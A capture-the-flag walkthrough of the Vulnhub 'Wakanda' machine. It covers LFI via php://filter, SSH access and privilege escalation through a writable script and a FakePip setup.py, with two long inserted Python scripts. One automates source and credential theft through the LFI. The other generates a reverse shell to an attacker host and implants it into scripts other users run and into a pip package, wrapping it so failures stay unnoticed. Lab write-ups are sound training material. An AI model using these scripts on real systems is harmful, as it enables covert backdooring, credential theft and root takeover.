
Hack The Machine WAKANDA BY- TURBANED SECUR!TY
Hello guys. Today I'll be taking on another CTF challenge, WAKANDA, available on Vulnhub. The machine name immediately caught my attention, since I'm a fan of Marvel Comics, so I decided to root it. It is a fantastic intermediate-level machine with a total of 3 flags that have to be collected to complete the challenge. Here are the machine's details and the tools and techniques used:
Machine Details-
Techniques and Tools used-
- Network scanning (Tool: Nmap)
- Directory brute-force attack (Tool: Dirbuster)
- Crawling through the web directories
- LFI using the php://filter wrapper
- Decoding the base64-encoded text to get the password
- SSH login
- Getting the initial flag
- Using find to locate the 2nd flag and check its owner
- Implanting a Python backdoor in .antivirus.py
- Getting a netcat session
- Getting the 2nd flag
- Exploiting fake pip for privilege escalation to root
- Getting root access and capturing the 3rd flag
LET’S ROLL UP OUR GEAR AND ATTACK-
Starting up- We use Netdiscover to get the IP address of the victim machine (Wakanda). Command used -> netdiscover -r (the -r option takes the range to scan).

ENUMERATION- Now, to find the open ports and services, we use the one and only tool, also called the hacker's buddy: Nmap. Command used -> nmap -Pn -A <ip address>. As I already had the details from my previous nmap scan, I specified the open ports directly when starting this scan to save time.

As port 80 is open, let's open it in the browser to see what we have on our plate. We will also check the page source.


In the page source you can see a reference to ?lang=fr. Keep this in mind: when you directory-brute-force the site with Dirbuster you will see the same name show up. Go ahead and open it in the browser.

So there is a PHP script (check your dirb output) that switches the page to French, which means the value of lang is used to pick a PHP file to include. That is exactly the situation where a php://filter payload lets us read the source of an included file instead of executing it, so let's test it for LFI. You can get the required payload from this awesome repository - https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/File%20Inclusion%20-%20Path%20Traversal#basic-lfi

So here we have a base64-encoded blob. Payload used to get it -> 192.168.1.8/?lang=php://filter/convert.base64-encode/resource=index (the convert.base64-encode filter makes include() return the base64 of index.php's source rather than running it; the resource is given without the .php extension because the script appends it). Let's decode it using an online decoder tool.
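As an added example that is not part of the original write-up, here is a small Python script that automates this step end to end: it builds the php://filter URL for the lang parameter, pulls the base64 blob out of the response, decodes it, and greps the recovered PHP source for password-like assignments. The target URL, the parameter name and the embedded sample index.php are assumptions/constructed data, not captured from the box.

```python
"""Added example for this write-up (not the author's code and not from
PayloadsAllTheThings): pull PHP source through the lang= include with the
php://filter base64 wrapper, then look for credentials in the decoded file.
TARGET, PARAM and SAMPLE_RESPONSE are assumptions / constructed data."""
import base64
import re
import urllib.parse
import urllib.request

TARGET = "http://192.168.1.8/"  # victim address from the write-up; adjust to your lab
PARAM = "lang"                  # the include parameter seen in the page source


def build_filter_url(base_url, param, resource):
    """convert.base64-encode makes include() emit the file's bytes base64-encoded
    instead of executing them, so the server's own PHP source leaks into the page.
    'resource' is passed without .php because the include appends the extension."""
    wrapper = "php://filter/convert.base64-encode/resource=" + resource
    return base_url + "?" + param + "=" + urllib.parse.quote(wrapper, safe="/:=")


def fetch(url):
    """Plain GET; only used by the live run at the bottom."""
    with urllib.request.urlopen(url, timeout=10) as resp:
        return resp.read().decode("utf-8", "replace")


def extract_base64(body):
    """The filter output lands in the HTML as one long base64 run; take the longest."""
    runs = re.findall(r"[A-Za-z0-9+/]{16,}={0,2}", body)
    if not runs:
        raise ValueError("no base64 blob in response: wrapper blocked or wrong parameter")
    return max(runs, key=len)


def decode_source(body):
    return base64.b64decode(extract_base64(body)).decode("utf-8", "replace")


# Matches $password = "..."; $db_pass = '...'; etc.  Loose on purpose: it is a
# triage grep for a lab page, not a PHP parser.
CRED_RE = re.compile(r"""\$(\w*(?:pass|pwd|secret|key)\w*)\s*=\s*["']([^"']+)["']""", re.I)


def find_credentials(source):
    return {name: value for name, value in CRED_RE.findall(source)}


# Constructed stand-in for index.php as it might come back through the filter.
SAMPLE_SOURCE = (
    '<?php\n'
    '$password = "example-not-the-real-one";\n'
    '$lang = isset($_GET["lang"]) ? $_GET["lang"] : "en";\n'
    'include($lang . ".php");\n'
    '?>\n'
)
SAMPLE_RESPONSE = "<html><body>" + base64.b64encode(SAMPLE_SOURCE.encode()).decode() + "</body></html>"


def demo():
    """Offline walk-through on the constructed response: (url, decoded source, credentials)."""
    url = build_filter_url(TARGET, PARAM, "index")
    source = decode_source(SAMPLE_RESPONSE)
    return url, source, find_credentials(source)


if __name__ == "__main__":
    url, _, _ = demo()
    try:  # live run against the box: same steps on the real response
        src = decode_source(fetch(url))
        print(src)
        print("credentials:", find_credentials(src))
    except Exception as exc:  # no lab reachable: fall back to the constructed sample
        print("live fetch failed (%s); offline sample gives:" % exc)
        print(find_credentials(decode_source(SAMPLE_RESPONSE)))
```

The same script works for any other file the include can reach (resource=config, resource=../something) as long as the script keeps appending .php; if the blob is missing from the response, the wrapper is being filtered or the parameter is not the one driving the include.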

So here we have a password. Let's SSH to the machine with the credentials we found: user mamadou, password Niamey4Ever227!!!. Since the login lands us in a Python interpreter rather than a normal shell, we import the pty module and spawn a /bin/bash shell from it.

Now let's grab our first flag and then look for the second one using find.


Here we can see that flag2 is owned by the user devops. Enumerating further, we also find that we have write access to .antivirus.py, a script that gets executed as devops. Let's implant our Python reverse-shell payload in it (you can get one from pentestmonkey - http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet), start a netcat listener, wait for the connection to come back, and spawn a bash shell.

Now let's go ahead and check for our 2nd flag.
->cd /home
->cat flag2.txt

Now let's check our sudo permissions -> sudo -l
Output-
devops@Wakanda1:~$ sudo -l
Matching Defaults entries for devops on Wakanda1:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User devops may run the following commands on Wakanda1:
    (ALL) NOPASSWD: /usr/bin/pip
"pip" can be run as root without providing a password, and "pip install" executes the package's setup.py as the invoking user, so we can abuse it to escalate our privileges. I found this method at https://github.com/0x00-0x00/FakePip. Just edit the reverse-shell address in the exploit and host it using Python, so we can download it to the victim machine with wget.



In the screenshot above we spawned a simple HTTP server to host the exploit and then fetched it with wget on the Wakanda machine.
Afterwards we start a netcat listener and type in the command given in the exploit's instructions:
->sudo /usr/bin/pip install . --upgrade --force-reinstall
devops@Wakanda1:/tmp/fakepip$ sudo /usr/bin/pip install . --upgrade --force-reinstall
Unpacking /tmp/fakepip
  Running setup.py (path:/tmp/pip-WU01on-build/setup.py) egg_info for package from file:///tmp/fakepip
Installing collected packages: FakePip
  Found existing installation: FakePip 0.0.1
    Uninstalling FakePip:
      Successfully uninstalled FakePip
  Running setup.py install for FakePip
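The two payload drops in this write-up, the writable .antivirus.py earlier and the FakePip setup.py here, rely on the same idea: put a Python connect-back shell where a more privileged user will execute it. The script below is an added example (not the author's code, not pentestmonkey's reverse shell and not the setup.py from the FakePip repository) that generates that payload and stages both drops. Its setup.py hooks the setuptools install command, which is consistent with the pip output above stopping at "Running setup.py install" once the shell connects. LHOST, LPORT, the stand-in .antivirus.py contents and all paths are assumptions.

```python
"""Added example for this write-up (not the author's code, not pentestmonkey's
reverse shell and not the FakePip repository's setup.py): generate a Python
connect-back payload and plant it where a more privileged user will run it.
Covers both drops from the walkthrough: the writable .antivirus.py that the
devops user executes, and a FakePip-style setup.py that `sudo pip install .`
executes as root.  LHOST, LPORT and every path here are assumptions."""
import os
import tempfile
import textwrap

LHOST = "192.168.1.100"  # attacker listener address (assumed)
LPORT = 4444             # nc -lvnp 4444 on the attacker (assumed)

# Connect-back shell: wire the socket onto stdin/stdout/stderr, then hand the
# listener an interactive bash inside a pty so job control and editing work.
PAYLOAD_TEMPLATE = textwrap.dedent('''\
    import os, pty, socket
    def _connect_back(host, port):
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((host, port))
        for fd in (0, 1, 2):
            os.dup2(s.fileno(), fd)
        pty.spawn("/bin/bash")
    _connect_back({host!r}, {port})
    ''')

# setup.py that hooks the install command: pip runs it as the invoking user,
# and under sudo that is root.  --force-reinstall makes the install step fire
# even when a FakePip 0.0.1 is already installed on the box.
SETUP_TEMPLATE = textwrap.dedent('''\
    from setuptools import setup
    from setuptools.command.install import install

    class ShellOnInstall(install):
        def run(self):
    {payload}
            install.run(self)

    setup(name="FakePip", version="0.0.1", cmdclass={{"install": ShellOnInstall}})
    ''')


def reverse_shell_source(lhost, lport):
    return PAYLOAD_TEMPLATE.format(host=lhost, port=int(lport))


def implant_script(path, lhost, lport):
    """Drop the payload into a script another user runs (the .antivirus.py case).
    The shebang stays on line 1, the original body is kept so the script still
    does its job once the shell exits, and the payload is wrapped in try/except
    so an unreachable listener does not crash the script and draw attention."""
    with open(path) as f:
        original = f.read()
    head, rest = "", original
    if original.startswith("#!"):
        first, _, rest = original.partition("\n")
        head = first + "\n"
    guarded = ("try:\n" + textwrap.indent(reverse_shell_source(lhost, lport), "    ")
               + "except Exception:\n    pass\n")
    patched = head + guarded + rest
    with open(path, "w") as f:
        f.write(patched)
    return patched


def write_fake_pip_package(directory, lhost, lport):
    """Create <directory>/setup.py for: sudo /usr/bin/pip install <directory> --upgrade --force-reinstall"""
    os.makedirs(directory, exist_ok=True)
    payload = textwrap.indent(reverse_shell_source(lhost, lport), " " * 8)
    path = os.path.join(directory, "setup.py")
    with open(path, "w") as f:
        f.write(SETUP_TEMPLATE.format(payload=payload))
    return path


def demo(workdir=None):
    """Stage both drops in a scratch directory and syntax-check them.
    compile() only parses, so nothing here connects anywhere."""
    workdir = workdir or tempfile.mkdtemp(prefix="wakanda-")
    target = os.path.join(workdir, ".antivirus.py")
    with open(target, "w") as f:  # constructed stand-in for the devops script
        f.write("#!/usr/bin/env python\nprint('scanning...')\n")
    patched = implant_script(target, LHOST, LPORT)
    setup_py = write_fake_pip_package(os.path.join(workdir, "fakepip"), LHOST, LPORT)
    with open(setup_py) as f:
        setup_src = f.read()
    compile(patched, target, "exec")
    compile(setup_src, setup_py, "exec")
    return {"dir": workdir, "antivirus": patched, "setup_py": setup_src}


if __name__ == "__main__":
    staged = demo()
    print("staged under", staged["dir"])
    print("attacker: nc -lvnp %d" % LPORT)
    print("victim:   sudo /usr/bin/pip install %s --upgrade --force-reinstall"
          % os.path.join(staged["dir"], "fakepip"))
```

Run it on the attacker side to stage the files, copy the fakepip directory to /tmp on the box (the write-up uses a Python HTTP server and wget for that), start the listener, and run the sudo pip command it prints. --force-reinstall matters: without it pip skips a version that is already installed and the install hook never fires, which is exactly the "Found existing installation: FakePip 0.0.1" case in the output above.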
And finally we have our reverse shell as root, so we can read the final root flag.
->cat root.txt
#Happy Hacking from Turbaned Security.

